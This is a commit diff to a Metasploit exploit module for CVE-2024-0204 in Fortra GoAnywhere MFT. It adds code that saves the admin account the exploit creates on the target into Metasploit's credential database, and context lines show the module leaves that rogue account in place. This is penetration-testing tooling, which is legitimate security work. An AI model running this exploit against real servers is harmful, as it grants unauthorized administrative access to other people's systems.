store the credentials we create in the DB

modules/exploits/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204.rb

@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Report
 
   def initialize(info = {})
     super(
@@ -153,6 +154,8 @@ def exploit
 
     print_status("Created account: #{admin_username}:#{admin_password}. Note: This account will not be deleted by the module.")
 
+    store_credentials(admin_username, admin_password)
+
     # Automatic targeting will detect the OS and product installation directory, by querying the About.xhtml page.
     if target.name == 'Automatic'
       res = send_request_cgi(
@@ -347,4 +350,31 @@ def get_viewstate(endpoint)
     vs_input['value']
   end
 
+  def store_credentials(username, password)
+    service_data = {
+      address: datastore['RHOST'],
+      port: datastore['RPORT'],
+      service_name: 'GoAnywhere MFT Admin Interface',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      origin_type: :service,
+      module_fullname: fullname,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
 end